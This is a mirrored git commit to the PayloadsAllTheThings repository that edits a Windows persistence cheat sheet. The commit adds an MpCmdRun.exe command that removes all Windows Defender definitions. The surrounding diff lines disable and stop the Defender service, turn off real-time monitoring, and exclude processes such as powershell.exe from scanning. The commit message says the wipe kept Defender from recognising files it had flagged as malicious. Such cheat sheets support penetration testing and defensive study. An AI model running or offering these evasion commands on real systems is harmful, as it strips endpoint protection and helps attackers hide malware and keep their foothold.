mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Update Windows - Persistence.md
Add example to `disable windows defender` which uses MpCmdRun.exe to reset the current definitions. I recently used this and it was sufficient, that defender did not recognize previously flagged malicious files. It is quite helpful in case, that Set-MpPreference is not present or that the attacker is not allowed to adjust the service.
This commit is contained in:
parent
45821c00ea
commit
6584df310f
1 changed files with 5 additions and 1 deletions
|
@ -51,6 +51,10 @@ sc config WinDefend start= disabled
|
||||||
sc stop WinDefend
|
sc stop WinDefend
|
||||||
Set-MpPreference -DisableRealtimeMonitoring $true
|
Set-MpPreference -DisableRealtimeMonitoring $true
|
||||||
|
|
||||||
|
# Wipe currently stored definitions
|
||||||
|
# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>
|
||||||
|
MpCmdRun.exe -RemoveDefinitions -All
|
||||||
|
|
||||||
## Exclude a process / location
|
## Exclude a process / location
|
||||||
Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
|
Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
|
||||||
Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
|
Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
|
||||||
|
|
Loading…
Reference in a new issue